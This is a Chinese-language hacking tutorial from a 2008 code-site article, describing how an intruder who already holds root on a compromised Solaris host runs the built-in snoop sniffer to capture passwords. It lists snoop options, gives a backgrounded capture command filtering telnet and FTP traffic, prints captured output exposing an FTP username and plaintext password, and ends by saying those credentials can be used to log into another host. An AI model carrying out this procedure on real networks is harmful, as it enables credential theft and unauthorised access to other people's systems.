当前位置: 代码网 > 服务器>网络安全>脚本攻防 > sniffer攻击实例

sniffer攻击实例

2008年10月08日 脚本攻防 我要评论
sniffer攻击实例 假设我们已经通过某种方法成功的攻人了 Solaris 主机 202.11.22.33(本文隐藏了实际 IP地址,下同)并且获得这台主机上的最高root权限。那么,现在我们就可以在这台主机上使用Sniffer... 08-10-08

假设我们已经通过某种方法成功的攻人了 solaris 主机 202.11.22.33(本文隐藏了实际 ip地址,下同)并且获得这台主机上的最高root权限。那么,现在我们就可以在这台主机上使用sniffer来嗅探此网段上传输的密码。

1.snoop简介

在solaris系统中有一个默认安装的sniffer软件叫做snoop,所以没有必要重新安装其他的sniffer了,可以直接使用snoop来进行嗅探。下面简要介绍一下snoop的使用方法。

snoop 是一个命令行的软件,它的使用方法为:snoop[选项][过滤条]

其中选项包括:

[-a]# 在 audio上

[-d device]# 设置的

[-s snaplen]# 将包截短

[-c count]#设置捕获包的数量

[-p]#关闭混杂模式

[-d]# 报告掉包

[-s]#报告包大小

[-i file]#从文件读人记录

[-o file]#把捕获情况存人文件

[-n flle]#从文件读人域名表

[-n]# 创建域名表

[-t r|a|d]#设置时间,可以为相对或绝对时间

[-v]#详细的包信息显示

[-v]#显示所有包信息

[-p first[,last] ]#显示指定的包

[-x offset[,length] ]# 显示 16进制数据

[-c]# 显示包过滤码

其中最常用的选项是-o和-c,通过一o选项可以把捕获情况输出到一个文件中,否则会显示在屏幕上。通过-c可以设置要捕获包的数量,否则就会无限制地捕获传输的包。

snoop的重点在于设置过滤条件,所谓过滤条件就是我们要捕获什么样的包,因为以太网上传输的数据量一般是相当大的,所以不能捕获所有传输的包,否则会无法找到我们要的信息,于是我们就设置一个过滤条件,只捕获我们要的包,例如含有密码的包。

过滤条件主要包括from、to、net和 port。其中from是指从特定主机发送过来的包,to是指发送到特定主机的包,net是来自或发往特定网络的包,port是指来自或发往特定端口的包。这些过滤条件可以通过and(且关系)、or(或关系)和not(非关系)来进行组合。例如,下面snoop命令捕获所有来自192.168.3.12地址的dns和nfs包:


snoop from 192.168.3.12 port domain or rpc nfs


2.snoop攻击实例

假设我们已经通过某种方法成功的攻人了solaris主机 202.11.22.33(本文隐藏了实际ip地址,下同)并且获得这台主机上的最高root权限。那么现在我们就可以在这台主机上使用snoop来嗅探此同段上传输的密码。

首先我们使用find命令查找一下此主机上的snoop安装在哪里:

#find/-name snoop -print

/usr/sbin/snoop

因为我们的目的是捕获网络上传输的密码,所以我们要设置snoop的过滤选项来捕获网络上所有的 telnet和 ftp包,使用下面的命令:

#nohup /usr/sbin/snoop -o slog -c 10000 port

telnet or port ftp&

我们使用nohup和&来把snoop挂在后台运行,这样,当我们从终端退出的时候,snoop仍然可以在后台运行。并且我们使用-o把嗅探结果保存在文件slog里,使用-c选项来设置一共捕获10000个包,以免捕获数据量太大而占据硬盘空间。port telnet or ftp就是过滤选项,它设置只捕获telnet和ftp包,因为这两种协议都使用密码验证而且密码不加密。

然后我们就可以退出登录,第二天再次登录上这台主机,可以看到当前目录下有一个slog文件,这就是嗅探结果。但是要注意这个文件不是文本文件,不能使用cat命令直接查看,必须用snoop的-i选项来查看,使用如下命令:

#/usr/sbin/snoop -i slog |more

这里,我们使用more来一点一点查看,发现 输出中有以下片段:

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

220 202.11.22.68

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

user bode\r\n

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

331 password require

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

pass zhangjm\r\n

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

202.11.22.68->gi-12-107.bta.net.cn ftp r port=1924

230 user bode logged

gi-12-107.bta.net.cn->202.11.22.68 ftp c port=1924

通过上面的记录我们可以看到,来自gi-12-107.bta.net.cn的用户使用 ftp登录上了202.11.22.68主机,它使用的用户名为bode,密码为zhangjm。于是我们就可以使用这个用户名和密码来登录上202.11.22.68了。




 

(0)

相关文章:

  • 另类巧妙的思路:旁门左道的入侵

    另类巧妙的思路:旁门左道的入侵

    另类巧妙的思路:旁门左道的入侵 很多的时候,入侵并不是单纯靠技术的,有很多是运气因素,更重要的是如何对一些摆在你面前的一些安全破绽的攻击。我很相信安全意识这个... [阅读全文]
  • 推荐:对FCBLOG的简单分析

    推荐:对FCBLOG的简单分析 一:古老的OR注入漏洞。看一下首页,做的好凑合。有个登陆的地方,如图1.二话不说,试’or’=’or’,点击登陆。没想到竟然直接进来了。我们看下它…

    2008年10月08日 网络安全
  • 渗透冰兰黑客基地

    渗透冰兰黑客基地

    渗透冰兰黑客基地 注:本人已经提交到C.R.S.T ,适合新人学习..首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能... [阅读全文]
  • 霸王背后的脆弱——完全解剖雷霆购物系统

    霸王背后的脆弱——完全解剖雷霆购物系统

    霸王背后的脆弱——完全解剖雷霆购物系统 雷霆购物系统是国内一个使用比较广泛的购物系统,现在,我们就来看看它的安全性究竟如何吧!从网上下载7.08最新版的雷霆购... [阅读全文]
  • 黑客对一台虚拟主机服务器的渗透

    黑客对一台虚拟主机服务器的渗透

    黑客对一台虚拟主机服务器的渗透 前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/do... [阅读全文]
  • 网站和数据库分离的入侵技术(图)

    网站和数据库分离的入侵技术(图) 前言:在我们入侵的过程中,很多人会遇到这种情况,拿到一个sa权限或是db_owner权限的注入点,但是数据库和web数据是两台分离的服务器,也就…

    2008年10月08日 网络安全

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com